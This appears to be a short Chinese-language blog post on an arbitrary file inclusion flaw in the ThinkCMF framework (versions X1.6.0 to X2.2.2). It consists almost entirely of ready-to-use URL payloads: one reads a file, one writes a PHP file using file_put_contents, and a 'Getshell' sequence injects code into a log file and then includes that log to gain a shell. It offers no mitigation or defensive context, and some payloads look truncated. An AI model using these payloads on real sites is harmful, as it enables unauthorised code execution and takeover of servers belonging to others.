ThinkCMF框架_任意文件包含漏洞

# ThinkCMF框架 任意文件包含漏洞
==影響版本==

ThinkCMF X1.6.0
ThinkCMF X2.1.0
ThinkCMF X2.2.0
ThinkCMF X2.2.1
ThinkCMF X2.2.2

==Payload==

?a=display&templateFile=README.md

==Payload (文件寫入) ==

?a=fetch&templateFile=public/index&prefix=''&content=file_put_contents('1.php','')

==Getshell==

?a=display&templateFile=');die();?>

http://target.domain/?a=display&templateFile=data/runtime/Logs/Portal/YY_MM_DD.log
http://target.domain/?a=display&templateFile=


http://target.domain/?a=display&templateFile=data/runtime/Logs/Portal/YY_MM_DD.log
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容